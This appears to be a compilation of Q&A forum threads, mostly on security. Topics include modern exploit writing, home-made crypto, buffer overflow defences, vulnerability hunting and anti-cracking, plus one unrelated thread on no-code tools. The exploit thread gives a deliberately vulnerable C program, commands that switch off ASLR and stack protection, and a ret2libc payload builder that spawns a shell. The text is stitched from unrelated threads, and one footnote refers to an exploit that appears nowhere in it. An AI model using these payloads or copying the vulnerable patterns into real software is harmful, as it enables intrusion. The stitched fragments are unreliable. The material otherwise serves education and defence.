What are some advanced and modern resources on exploit writing?

I've read and finished both Reversing: Secrets of Reverse Engineering and Hacking: The Art of Exploitation. Both were illuminating in their own way, but I still feel that many of the techniques and much of the information presented in them are outdated to some degree.
When the infamous Phrack article, Smashing the Stack for Fun and Profit, was written in 1996, it was just before what I sort of consider the computer security "golden age".
Writing exploits in the years that followed was relatively easy. Some basic knowledge of C and assembly was all that was required to perform a buffer overflow and execute arbitrary shellcode on a victim's machine.
To put it lightly, things have gotten a lot more complicated. Now security engineers have to contend with things like Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP), Stack Cookies, Heap Cookies, and much more. The complexity of writing exploits went up at least an order of magnitude.
You can't even run most of the buffer-overrun exploits in the tutorials you'll find today without compiling with a bunch of flags to turn off modern protections.
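For context, here is the kind of toy target those tutorials use, together with the flags commonly used to switch the protections back off. A minimal sketch; the flag names are from mainstream GCC/Linux and may differ on your toolchain:

```c
/* vuln.c -- the classic tutorial target: strcpy() into a fixed-size
 * stack buffer. To experiment, the protections above are usually
 * switched back off at build time, e.g. on Linux/GCC:
 *   gcc -m32 -fno-stack-protector -z execstack -no-pie -o vuln vuln.c
 * and ASLR is disabled system-wide with:
 *   echo 0 > /proc/sys/kernel/randomize_va_space
 */
#include <stdio.h>
#include <string.h>

void vulnerable(const char *input) {
    char buf[64];
    strcpy(buf, input);   /* no bounds check: bytes past 64 overwrite the
                             saved frame pointer and return address */
    printf("you said: %s\n", buf);
}

int main(int argc, char **argv) {
    if (argc > 1)
        vulnerable(argv[1]);
    return 0;
}
```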
Now if you want to write an exploit you have to devise ways to turn off DEP, spray the heap with your shellcode hundreds of times, and attempt to guess a random memory location near your shellcode. Not to mention the pervasiveness of managed languages in use today, which are much more resistant to these vulnerabilities.
I'm looking to extend my security knowledge beyond writing toy exploits for a decade-old system. I'm having trouble locating resources that address writing exploits in the face of all the protections I outlined above.
What are the more advanced and prevalent papers, books or other resources devoted to contending with the challenges of writing exploits for modern systems?

You mentioned 'Smashing the Stack'. Research-wise, that article was outdated before it was even published. The late-80s Morris worm used the technique (to exploit fingerd, IIRC). At the time it caused a huge stir, because back then every server was written in optimistic C.
It took a few (10 or so) years, but gradually everyone became more conscious of security concerns related to public-facing servers.
The servers written in C were subjected to lots of security analysis and at the same time server-side processing branched out into other languages and runtimes.
Today things look a bit different. Servers are not considered a big target. These days it's clients that are the big fish. Hijack a client and the server will allow you to operate under that client's credentials.
The landscape has changed.
Personally I'm a sporadic fan of playing assembly games. I have no practical use for them, but if you want to get in on this I'd recommend checking out the Metasploit source and reading their mailing lists. They do a lot of crazy stuff and it's all out there in the open.

I'm impressed; you are a leet hacker like me. You need to move to web applications. The majority of CVE numbers issued in the past few years have been for web applications.
Read these two papers:
http://www.securereality.com.au/studyinscarlet.txt
http://www.ngssoftware.com/papers/HackproofingMySQL.pdf
Get a LAMP stack and install these three applications:
http://sourceforge.net/projects/dvwa/ (php)
http://sourceforge.net/projects/gsblogger/ (php)
http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project (j2ee)
You should download w3af and master it. Write plugins for it. w3af is an awesome attack platform, but it is buggy and has problems with DVWA; it will rip up GreyScale (the gsblogger project above). Acunetix is a good commercial scanner, but it is expensive.

I highly recommend "The Shellcoder's Handbook". It's easily the best reference I've ever read when it comes to writing exploits.
If you're interested in writing exploits, you're likely going to have to learn how to reverse engineer. For 99% of the world, this means IDA Pro. In my experience, there's no better IDA Pro book than Chris Eagle's "The IDA Pro Book". He details pretty much everything you'll ever need to do in IDA Pro.
There's a pretty great reverse engineering community at OpenRCE.org. Tons of papers and various helpful apps are available there. I learned about this website at an excellent bi-annual reverse engineering conference called RECon. The next event will be in 2010.
Most research these days will be "low-hanging fruit". The majority of talks at recent security conferences I've been to have been about vulnerabilities on mobile platforms (iPhone, Android, etc) where there are few to none of the protections available on modern OSes.
In general, there won't be a single reference out there that will explain how to write a modern exploit, because there's a whole host of protections built into OSes. For example, say you've found a heap vulnerability, but that pesky new Safe Unlinking feature in Windows is keeping you from gaining execution. You'd have to know that two geniuses researched this feature and found a flaw.
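To make that example concrete, here is a conceptual sketch of unlinking a node from a doubly linked free list, the operation that safe unlinking hardens. This is modeled on generic list code, not Windows' literal heap internals:

```c
#include <stdlib.h>

typedef struct node { struct node *flink, *blink; } node;

/* Classic unlink: if an overflow let the attacker control e->flink and
   e->blink, these two stores become write-what-where primitives. */
void unsafe_unlink(node *e) {
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
}

/* Safe unlinking: refuse unless both neighbors still point back at e,
   which corrupted metadata almost never does. */
void safe_unlink(node *e) {
    if (e->flink->blink != e || e->blink->flink != e)
        abort();   /* corruption detected; bail out instead of writing */
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
}
```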
Good luck in your studies. Exploit writing is extremely frustrating, and EXTREMELY rewarding!
Bah! The spam thingy is keeping me from posting all of my links. Sorry!

DEP (Data Execution Prevention), NX (No-eXecute) and other security enhancements that specifically disallow execution are easily bypassed by using other exploit techniques such as ret2libc or ret2esp. When an application is compiled, it is usually linked against other libraries (Linux) or DLLs (Windows). These ret2* techniques simply redirect execution to an existing function that already resides in memory.
For example, in a normal exploit you may overflow the stack and then take control of the return address (EIP) with the address of a NOP sled, your shellcode, or an environment variable that contains your shellcode. When attempting this exploit on a system that does not allow the stack to be executable, your code will not run. Instead, when you overflow the return address (EIP) you can point it at an existing function in memory such as system() or execv(). You pre-populate the stack (or registers, depending on the calling convention) with the parameters the function expects, and now you can spawn /bin/sh without executing anything from the stack.
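Here is a hedged sketch of what that payload layout can look like against a 32-bit, little-endian, non-ASLR target with a 64-byte buffer sitting directly below the saved EBP. The three addresses are placeholders you would recover from the target with a debugger (e.g. gdb's print &system); offsets vary per binary:

```c
/* build_payload.c -- writes the payload to stdout; pipe it into the
 * vulnerable program's input. All three addresses are placeholders. */
#include <stdio.h>
#include <string.h>

int main(void) {
    unsigned char payload[80];
    unsigned int system_addr = 0xb7e42da0;  /* &system   (placeholder) */
    unsigned int exit_addr   = 0xb7e369d0;  /* &exit     (placeholder) */
    unsigned int binsh_addr  = 0xb7f639ff;  /* "/bin/sh" (placeholder) */

    memset(payload, 'A', 64);               /* fill the buffer          */
    memcpy(payload + 64, "BBBB", 4);        /* saved EBP                */
    memcpy(payload + 68, &system_addr, 4);  /* overwritten EIP          */
    memcpy(payload + 72, &exit_addr, 4);    /* where system() returns   */
    memcpy(payload + 76, &binsh_addr, 4);   /* system()'s argument      */

    fwrite(payload, 1, sizeof payload, stdout);
    return 0;
}
```

With those three words in place, the overflowed function "returns" into system() with "/bin/sh" as its argument, exactly as described above, without executing a byte of the stack.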
For more information look here:
http://web.textfiles.com/hacking/smackthestack.txt


Using built-in functions

I am developing a Windows Forms application in C#. I have heard that one should not use built-in methods and functions in code, since hackers have a deep understanding of such built-in methods and know how to defeat them; instead, one should always use one's own functions and methods, and if not, at least call built-in functions intelligently from those newly made functions. How true is that?
A supporting example in favour of my argument is that I have seen developers always develop their own encryption algorithms and hash functions in place of built-in ones like AES, DES, and RC4, since they believe the built-in encryption algorithms often have backdoors in them.
What?! No, no, no! Whoever told you this is just wrong.
There is a common fallacy that published source code is more vulnerable to "h4ckerz" because it is available for anyone to spot the flaws in. However, I'm glad you mentioned crypto, because this is an area where this line of reasoning really stands out as the fallacy it is.
One of the most popular questions of all time on https://security.stackexchange.com/ is about a developer (in the OP he was given the pseudonym "Dave") who shared this fear of published code. Dave, like the developer you saw, was trying to homebrew his own encryption algorithm. Here's one of the most popular comments in that thread:
Dave has a fundamentally false premise, that the security of an algorithm relies on (even partially) its obscurity - that's not the case. The security of a hashing algorithm relies on the limits of our understanding of mathematics, and, to a lesser extent, the hardware ability to brute-force it. Once Dave accepts this reality (and it really is reality, read the Wikipedia article on hashing), it's a question of who is smarter - Dave by himself, or a large group of specialists devoted to this very particular problem. (emphasis added)
As a matter of fact, as it stands now, the top two memes on Security.SE are "Don't roll your own" and "Don't be a Dave".
While this has all been about crypto, it applies in general to most open-source software. The chance that a backdoor will get found and fixed goes up with each new set of eyes laid on the code. This should be a simple and uncontroversial premise: the more people are looking for something, the higher the chance it will be found. Yes, this applies to malicious users looking for exploits. However, it also applies to power users, white hat hackers, security researchers, cryptographers, professional developers, and others working for "good", who generally (hopefully) outnumber those working for "evil".

The fear of published code also implicitly relies on the false premise that hackers need to see the source code to do bad things. This should be obviously false based on the sheer number of proprietary systems whose source code has never been published (various Microsoft and Adobe programs come to mind) that have been inundated with vulnerabilities for years. Maybe having source code to read makes the hacker's job easier, but maybe not: is it easier to pore over source code looking for an attack vector, or to just use scanning tools and scripts against a compiled binary?
tl;dr Don't be a Dave. Rolling your own means you have to be the best at everything to succeed, instead of taking a sampling of the best the community has to offer.
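To see concretely why rolling your own fails, here is a hypothetical sketch of the sort of "custom encryption" a Dave writes (the function is invented for illustration): a repeating-key XOR that looks scrambled but gives up its whole key to a single known plaintext.

```c
/* dave_crypt.c -- hypothetical homebrew "encryption": repeating-key XOR.
 * The output looks scrambled, but XORing one known plaintext against its
 * ciphertext hands back the entire key, and equal bytes at equal key
 * offsets leak patterns across the whole message. */
#include <stddef.h>

void dave_crypt(unsigned char *data, size_t len,
                const unsigned char *key, size_t keylen) {
    for (size_t i = 0; i < len; i++)
        data[i] ^= key[i % keylen];  /* XOR is its own inverse, so this
                                        "decrypts" too, for anyone who
                                        recovers the key */
}
```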
Heartbleed
In your comment, you rebut:
Then why was the Heartbleed bug in openSSL not found and corrected [earlier]?
Because no one was looking at it. That's the sad truth. Here's the difference -- what happened once someone did find it? Now tens of thousands of security researchers, crypto experts, and others are looking at it. Suppose the same kind of vulnerability existed in one of the proprietary products I mentioned earlier, which it very well could. Once it's caught (if it's caught), ask yourself:
Could the team of programmers at the company responsible benefit from the help of the entire worldwide community of security experts, cryptographers, and other analysts right now?
If a bug this critical were discovered (and that's a big if!) in your software, would you be prepared to deal with the fallout caused by your custom implementation?
Unless you know of specific failure modes or weaknesses of the built-in methods your application would use and know how to minimize or eliminate them, it is probably better to use the methods provided by the language or library designers, which will often be both more efficient and more secure than what an average programmer would come up with on the fly for a particular project.
Your example absolutely does not support your view: developing your own encryption algorithm without some serious background in the domain and review by cryptanalysts, and then employing it in security-critical code, is a recipe for disaster. Even developing your own custom implementation of an industry standard encryption algorithm can present problems, and almost certainly will if you are inexperienced at it.

What are the prevention techniques for buffer overflow attacks?

What are the ideas for preventing buffer overflow attacks? I heard about StackGuard, but is this problem now completely solved by applying StackGuard or a combination of it with other techniques?

After that warm-up, a question for you as experienced programmers: why do you think it is so difficult to provide adequate defenses against buffer overflow attacks?
Edit: thanks for all the answers and for keeping the security tag active :)
There's a bunch of things you can do. In no particular order...
First, if your language choices are equally split (or close to it) between one that allows direct memory access and one that doesn't, choose the one that doesn't. That is, use Perl, Python, Lisp, Java, etc. over C/C++. This isn't always an option, but it does help prevent you from shooting yourself in the foot.
Second, in languages where you have direct memory access, if classes are available that handle the memory for you, like std::string, use them. Prefer well-exercised classes to classes that have fewer users. More use means that simple problems are more likely to have been discovered in regular usage.
Third, use hardening options like ASLR and DEP. Use any security-related options your compiler and platform offer. This won't prevent buffer overflows, but it will help mitigate the impact of any overflows.
Fourth, use static code analysis tools like Fortify, Qualys, or Veracode's service to discover overflows that you didn't mean to code. Then fix the stuff that's discovered.
Fifth, learn how overflows work, and how to spot them in code (see the sketch after this list). All your coworkers should learn this, too. Create an organization-wide policy that requires people to be trained in how overruns (and other vulns) work.
Sixth, do secure code reviews separately from regular code reviews. Regular code reviews make sure code works, passes functional tests, and meets coding policy (indentation, naming conventions, etc.). Secure code reviews are specifically, explicitly, and only intended to look for security issues. Do secure code reviews on all the code you can. If you have to prioritize, start with mission-critical code and code where problems are likely: where trust boundaries are crossed (learn about data flow diagrams and threat models, and create them), where interpreters are used, and especially where user input is passed, stored, or retrieved, including data retrieved from your database.
Seventh, if you have the money, hire a good consultant like Neohapsis, VSR, Matasano, etc. to review your product. They'll find far more than overruns, and your product will be all the better for it.
Eighth, make sure your QA team knows how overruns work and how to test for them. QA should have test cases specifically designed to find overruns in all inputs.
Ninth, do fuzzing. Fuzzing finds an amazingly large number of overflows in many products.
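As promised in point five, here is a minimal sketch of the most common pattern to learn to spot, an unbounded copy, next to its bounded fix:

```c
#include <stdio.h>
#include <string.h>

void risky(const char *input) {
    char buf[32];
    strcpy(buf, input);                      /* unbounded: overflows if
                                                input is 32+ chars       */
}

void safer(const char *input) {
    char buf[32];
    snprintf(buf, sizeof buf, "%s", input);  /* truncates instead of
                                                overflowing, and always
                                                NUL-terminates           */
}
```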
Edited to add: I misread the question. The title says "what are the techniques" but the text says "why is it hard".
It's hard because it's so easy to make a mistake. Little mistakes, like off-by-one errors or numeric conversions, can lead to overflows. Programs are complex beasts, with complex interactions. Where there's complexity, there's problems.
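For example, here is a sketch of an off-by-one that easily survives casual review:

```c
#include <string.h>

void off_by_one(const char *src) {
    char buf[16];
    if (strlen(src) <= sizeof buf) {  /* bug: should be <, not <= */
        strcpy(buf, src);             /* a 16-char string writes its
                                         terminating NUL one byte past
                                         the end of buf               */
    }
}
```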
Or, to turn the question back on you: why is it so hard to write bug-free code?
Buffer overflow exploits can be prevented. If programmers were perfect, there would be no unchecked buffers and, consequently, no buffer overflow exploits. However, programmers are not perfect, and unchecked buffers continue to abound.
Only one technique is necessary: Don't trust data from external sources.
There's no magic bullet for security: you have to design carefully, code carefully, hold code reviews, test, and arrange to fix vulnerabilities as they arise.
Fortunately, the specific case of buffer overflows has been a solved problem for a long time. Most programming languages have array bounds checking and do not allow programs to make up pointers. Just don't use the few that permit buffer overflows, such as C and C++.
Of course, this applies to the whole software stack, from embedded firmware¹ up to your application.
¹ For those of you not familiar with the technologies involved, this exploit can allow an attacker on the network to wake up and take control of a powered off computer. (Typical firewall configurations block the offending packets.)
You can run analyzers to help you find problems before the code goes into production. Our Memory Safety Checker will find buffer overruns, bad pointer faults, array access errors, and memory management mistakes in C code by instrumenting your code to watch for mistakes at the moment they are made. If you want the C program to be impervious to such errors, you can simply use the results of the Memory Safety analyzer as the production version of your code.
In modern exploitation the big three are:
ASLR
Canary
NX Bit
Modern builds of GCC apply canaries by default. Not all ASLR is created equal: Windows 7, Linux and *BSD have some of the best ASLR, while OS X has by far the worst ASLR implementation; it's trivial to bypass. Some of the most advanced buffer overflow attacks use exotic methods to bypass ASLR. The NX bit is by far the easiest protection to bypass: return-to-libc style attacks make it a non-issue for exploit developers.
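For the canary case, this is a conceptual sketch of what GCC's -fstack-protector arranges. The real check is emitted by the compiler in the function epilogue and calls __stack_chk_fail(), so treat this as illustration, not compiler output:

```c
#include <stdlib.h>
#include <string.h>

/* set to a random value at process startup by the C runtime */
extern unsigned long __stack_chk_guard;

void protected_fn(const char *input) {
    unsigned long canary = __stack_chk_guard;  /* prologue: copy guard  */
    char buf[64];

    strcpy(buf, input);   /* a linear overflow that reaches the return
                             address must trample the canary first      */

    if (canary != __stack_chk_guard)  /* epilogue: recheck before ret   */
        abort();                      /* real code calls
                                         __stack_chk_fail() instead     */
}
```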

Finding Vulnerabilities in Software

I'm interested to know the techniques that are used to discover vulnerabilities. I know the theory about buffer overflows, format string exploits, etc., and I've also written some of them. But I still don't see how to find a vulnerability in an efficient way.
I'm not looking for a magic wand, just the most common techniques. Reading through the whole source is an epic task for any sizable project, assuming you even have access to the source, and manually fuzzing the input isn't comfortable either. So I'm wondering about tools that help.
E.g.
I don't understand how the dev teams can find vulnerabilities to jailbreak iPhones so fast. They don't have source code, they can't execute programs, and since there is only a small number of default programs, I wouldn't expect a large number of security holes. So how do they find this kind of vulnerability so quickly?
Thank you in advance.
On the lower layers, manually examining memory can be very revealing. You can certainly view memory with a tool like Visual Studio, and I would imagine that someone has even written a tool to crudely reconstruct an application based on the instructions it executes and the data structures it places into memory.
On the web, I have found many sequence-related exploits by simply reversing the order in which an operation occurs (for example, an online transaction). Because the server is stateful but the client is stateless, you can rapidly exploit a poorly-designed process by emulating a different sequence.
As to the speed of discovery: I think quantity often trumps brilliance...put a piece of software, even a good one, in the hands of a million bored/curious/motivated people, and vulnerabilities are bound to be discovered. There is a tremendous rush to get products out the door.
There is no truly efficient way to do this; firms spend a good deal of money to produce and maintain secure software. Ideally, their work in securing software does not start with looking for vulnerabilities in the finished product; many vulns have already been eradicated by the time the software ships.
Back to your question: it will depend on what you have (working binaries, complete/partial source code, etc.). On the other hand, the goal is not finding ANY vulnerability, but finding the ones that count (e.g., those that matter to the client of the audit or to the software owner). Right?
Scoping the audit that way will help you understand the inputs and functions you need to worry about. Once you have localized these, you may already have a feel for the software's quality: if it isn't very good, then fuzzing will probably find you some bugs. Otherwise, you need to start understanding those functions and how the input is used within the code, to see whether the code can be subverted in any way.
Some experience will help you weigh how much effort to put into each task and when to push further. For example, if you see bad practices being used, delve deeper. If you see crypto being implemented from scratch, delve deeper. Etc.
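As a concrete starting point for the fuzzing route, here is a sketch of the dumbest possible mutation fuzzer. ./target and seed.bin are hypothetical stand-ins, and real fuzzers (AFL and friends) add coverage feedback and crash triage:

```c
/* dumbfuzz.c -- flip one random bit of a known-good input and see if
 * "./target" chokes on it. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

int main(void) {
    unsigned char seed[4096];
    FILE *f = fopen("seed.bin", "rb");
    if (!f) { perror("seed.bin"); return 1; }
    size_t n = fread(seed, 1, sizeof seed, f);
    fclose(f);
    if (n == 0) return 1;

    srand((unsigned)time(NULL));
    for (int i = 0; i < 10000; i++) {
        unsigned char buf[4096];
        memcpy(buf, seed, n);
        buf[rand() % n] ^= (unsigned char)(1 << (rand() % 8));

        FILE *out = fopen("fuzzed.bin", "wb");
        if (!out) return 1;
        fwrite(buf, 1, n, out);
        fclose(out);

        /* crude crash check: a nonzero exit status is "interesting" */
        if (system("./target fuzzed.bin") != 0)
            printf("interesting input at iteration %d\n", i);
    }
    return 0;
}
```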
Aside from buffer overflow and format string exploits, you may want to read a bit on code injection (a lot of what you'll come across will be web/DB related, but dig deeper). AFAIK this was a huge force in jailbreaking the iThingies. Saurik's MobileSubstrate allows (allowed?) you to load third-party .dylibs and call any code contained in those.

Successful Non-programmer, 5GL, Visual, 0 Source Code or Similar Tools?

Can anyone give me an example of successful non-programmer, 5GL (not that I am sure what they are!), visual, 0 source code or similar tools that business users or analysts can use to create applications?
I don’t believe there are and I would like to be proven wrong.
At the company I work at, we have developed an in-house MVC framework that we use to develop web applications. It is basically a reduced state machine written in XML (à la Spring WebFlow) for the controller, and a simple template-based engine for presentation. Some of the benefits:
dynamic nature: no need to recompile to see the changes
reduced “semantic load”: basically, actions in the controller know only “if”. Therefore, it is easy to train someone to develop apps.
The current trend in the company (or at least at management level) is to try to produce tools for the platform that require 0 source code, are visual, etc. This has a good effect on clients (or at least on their management) since:
they can be convinced that this way they will need no programmers, or at least will be able to hire end-of-the-ladder programmers who cost much less than typical programmers.
It appears that there is reduced risk involved, since the tool limits what the implementer or user (just don’t use the word programmer!) can do, so there is less chance of introducing errors.
It appears to simplify the whole problem, since there seems to be no programming involved (programming being notoriously complex). Since applications load dynamically, there is less complexity than is typically associated with the J2EE lifecycle: compile, package, deploy, etc.
I am personally skeptical that something like this can be achieved. The solution we have today has a number of problems:
Implementers write JavaScript code to enrich pages (this could be solved by developing widgets). Albeit client-side, it is still code that can become very complex and result in some difficult bugs.
There is already a visual tool, but implementers prefer editing XML since it is quicker and easier. For comparison, I guess not many use the Eclipse Spring WebFlow plug-in to edit flow XML.
There is very poor reuse in the solution (based on copy-pasting XML). This hampers productivity and some other aspects, like fostering business knowledge.
There have been numerous performance and other issues based on incorrect use of the tools. No matter how reduced the playing field, there is always room for error.
While the platform is probably more productive than Struts, I doubt it is more productive than today’s RAD web frameworks like RoR or Grails.
Verbosity
Historically, there have been numerous failures in this direction. The idea of programs written by non-programmers is old but, AFAIK, has never been successful. At a certain level, the power of source code becomes irreplaceable.
Today there is a lot of talk about DSLs, but not as something non-programmers should write; more as something they could read.
It seems to me that the direction the company is taking in this respect is a dead end. What do you think?
EDIT: It is worth noting (and that's where some of the inspiration is coming from) that many big players are experimenting in that direction. See Microsoft Popfly, Google Sites, iRise, many mashup solutions, etc.
Yes, it's a dead end. The problem is simple: no matter how simple you make the expression of a solution, you still have to analyze and understand the problem to be solved. That's about 80-90% of how (most good) programmers spend their time, and it's the part that takes the real skill and thinking. Yes, once you've decided what to do, there's some skill involved in figuring out how to do that (in a programming language of your choice). In most cases, that's a small part of the problem, and the least open to things like schedule slippage, cost overrun or outright failure.
Most serious problems in software projects occur at a much earlier stage, in the part where you're simply trying to figure out what the system should do, what users must/should/may do which things, what problems the system will (and won't) attempt to solve, and so on. Those are the hard problems, and changing the environment to express the solution in some way other than source code will do precisely nothing to help any of those difficult problems.
For a more complete treatise on the subject, you might want to read No Silver Bullet - Essence and Accident in Software Engineering, by Frederick Brooks (Included in the 20th Anniversary Edition of The Mythical Man-Month). The entire paper is about essentially this question: how much of the effort involved in software engineering is essential, and how much is an accidental result of the tools, environments, programming languages, etc., that we use. His conclusion was that no technology was available that gave any reasonable hope of improving productivity by as much as one order of magnitude.
Not to question the decision to use 5GLs, etc, but programming is hard.
Jon Skeet - Programming is Hard
Coding Horror - Programming is Hard
5GLs have been considered a dead-end for a while now.
I'm thinking of the family of products that includes MS Access, Excel, Clarion for DOS, etc., where you can make applications with 0 source code and no programmers. Not that they are capable of AI-quality operations, but they can make very usable applications.
There will always be "real" languages to do the work, but we can drag and drop the workflow.
I'm using Apple's Automator which allows users to chain together "Actions" exposed by the various applications on their systems.
Actions have inputs and/or outputs, some have UI elements and basic logic can be applied to the chain.
The key difference between Automator and other visual environments is that the actions use existing application code and don't require any special installation.
More info: http://www.macosxautomation.com/automator/
I've used it to "automate" many batch processes and had really great results (it surprises me every time). I've got it running builds and backups, and whenever I need to process a mess of text files it comes through.
I would love to know whether iHook or Platypus (OS X wrapper builders for shell scripts) could let me develop plugins in Python...
There is definitely room for more applications like this and for more support from OSX application developers but the idea is sound.
Until there's major support there aren't many "actions" available, but a quick check on my system just showed me an extra 30 that I didn't know I had.
PS. There was another app for pre-OS X called "Filter Tops" which had a much more limited set of plugins.
How about Dabble DB?
Of course, just like MS Access and other non-programmer programming platforms, it has some necessary limitations in order that the user won't get him or herself stuck... as John pointed out programming is hard. But it does give the user a lot of power, and it seems that most applications that non-programmers want to build are database-type applications anyway.

Need advice to design 'crack-proof' software [closed]

I am currently working on a project where I need to create an architecture, framework, or set of standards that will "at least" increase the effort required to crack a piece of software, i.e., add to software security. There are already different ways to activate software, including online activation, keys, etc. I am currently studying a few research papers as well, but there are still a lot of things I want to discuss.
Could someone guide me to a decent forum, mailing list, or something like that? Any other help would also be appreciated.
I'll tell you the closest thing to "crackproof": a web application.
Desktop applications are doomed, for many other reasons, but making your application run "in the cloud", in a browser, gives you a lot more control about security.
Desktop software runs on the client's computer, so the client has full access to it. A web app runs on your server, so the client only sees a tiny bit of it.
You need to begin by infiltrating the local hacking gang, posing as an 11 year old who wants to "hack it up". Once you've earned their trust you can learn what features they find hardest to crack. As you secretly release "uncrackable" software to the local message boards, you can see what they do with it. Build upon your inner knowledge until they can no longer crack your software. When that is done, let your identity be known. Ideally, this will be seen as a sign of betrayal, that you're working against them. Hopefully this will lead them to contact other hackers outside the local community to attack your software.
Continue until you've reached the top of the hacker mafia. Write your thesis as a book, sell to HBO.
Isn't it a sign of success when your product gets cracked? :)
Seriously though - one approach is to use License objects that are serialized to XML and then encrypted using public/private key pairs. They are then read back in at runtime, de-serialized and processed to ensure they are valid.
But there is still the ubiquitous "IsValid()" method which can be cracked to always return true.
You could even put that method into a signed assembly to prevent tampering, but all you've done then is create another layer of "IsValid()" which too can be cracked.
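For illustration, here is a hedged sketch of that license-object shape, with the weak point called out. verify_signature() is a hypothetical placeholder for a real public-key check (e.g. via OpenSSL), not a library API:

```c
#include <stdbool.h>
#include <time.h>

typedef struct {
    char          customer[64];
    time_t        expires;
    unsigned char signature[256];  /* public-key signature over the
                                      fields above                     */
} License;

/* hypothetical helper: a real implementation would verify the
   signature against the vendor's public key */
bool verify_signature(const License *lic);

bool is_valid(const License *lic) {
    if (!verify_signature(lic))    /* forged or tampered license */
        return false;
    return time(NULL) < lic->expires;
    /* the weak point described above: a cracker simply patches
       is_valid() to return true, however strong the crypto is */
}
```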
We use licenses to turn on or off various features in our software, and to validate support/upgrade periods. But this is only for our legitimate customers. Anyone who wants to bypass it probably could.
We trust our legitimate customers to not try to bypass the licensing, and we accept that our illegitimate customers will find a way.
We would waste more money attempting to improve the 'tamper-proof' nature of our solution than we lose to people who pirate our software.
Plus you've got to consider the pain to our legitimate customers, and asking them to paste a license string from their online account page is as much pain as I'd want to put them through. Why create additional barriers to entry for potential customers?
Anyway, depending on which solution you've got in place already, my description above might give you some ideas that could decrease the likelihood that someone will crack your product.
As nute said, any code you release to a customer's machine is crackable.
Don't try for "uncrackable." Try for "there's enough deterrent to reasonably protect my assets."
There are a lot of ways you can try and increase the cost of cracking. Most of them cost you but there is one thing you can do that actually reduces your costs while increasing the cost of cracking: deliver often.
There is a finite cost to cracking any given binary. That cost is increased by the number of binaries being cracked. If you release new functionality every week, you essentially bifurcate your users into two groups:
Those who don't need the latest features and can wait for a crack.
Those who do need the latest features and will pay for your software.
By engaging in the traditional anti-cracking techniques, you can multiply the cost of cracking one binary and, consequently, widen the gap between when a new feature is released and when it is available on the black market. To top it all off, your costs will go down and the amount of value you deliver in a period of time will go up; that's what makes this approach effectively free.
The more often you release, the more you will find that quality and value go up, cost goes down, and the less likely people will be to steal your software.
As others have mentioned, once you release the bits to users you have given up control of them. A dedicated hacker can change the code to do whatever they want. If you want something that is closer to crack-proof, don't release the bits to users. Keep it on the server. Provide access to the application through the Internet or, if the user needs a desktop client, keep critical bits on the server and provide access to them via web services.
Like others have said, there is no way to create completely crack-proof software, but there are ways to make cracking it more difficult; most of these techniques are actually used by bad guys to hide malware inside binaries, and by game companies to make cracking and copying games more difficult.
If you are really serious about doing this, you could check e.g., what executable packers like UPX do. But then you need to implement the unpacker also. I do not actually recommend doing this, but studying game protectors and binary obfuscation might help you in your quest.
First of all, in what language are you writing this?
It's true that a crack-proof program is impossible to achieve, but you can always make it harder. A naive approach to application security means that a program can be cracked in minutes. Some tips:
If you're deploying to a virtual machine, that's too bad. There aren't many alternatives there. All popular VMs (Java, CLR, etc.) are very simple to decompile, and no obfuscator or signature is enough.
Try to decouple the UI programming as much as possible from the underlying program. This is also a great design principle, and it will make it harder for the cracker to trace from the GUI (e.g., the "enter your serial" window) to the code where you actually perform the check.
If you're compiling to actual native machine code, always build as a release (not including any debug information is crucial), with optimization as high as possible. Also, in the critical parts of your application (e.g., where you validate the software), be sure to make the check an inline function call so you don't end up with a single point of failure, and call it from many different places in your app (see the sketch after these tips).
As was said before, packers always add another layer of protection. And while there are many reliable choices now, you can end up being flagged as a virus (a false positive) by some anti-virus programs, and all the famous choices (e.g. UPX) already have pretty straightforward unpackers.
There are some anti-debugging tricks you can also look into. But these are a hassle for you, because at some point you might also need to debug the release application!
Keep in mind that your priority is to make the critical part of your code as untraceable as possible. Clear-text strings, library calls, GUI elements, etc. are all points an attacker may use to trace the critical parts of your code.
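As referenced in the native-code tip above, here is a sketch of the "inline the check, call it from many places" idea. check_key() is a hypothetical placeholder, and static inline only encourages inlining rather than guaranteeing it:

```c
#include <stdbool.h>
#include <string.h>

/* hypothetical placeholder for the real validation logic */
static inline bool check_key(const char *key) {
    return key != NULL && strlen(key) == 16 && key[0] == 'K';
}

void save_document(const char *key) {
    if (!check_key(key)) return;   /* copy #1 of the check */
    /* ... real work ... */
}

void export_report(const char *key) {
    if (!check_key(key)) return;   /* copy #2: a cracker must find and
                                      patch every inlined instance     */
    /* ... real work ... */
}
```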
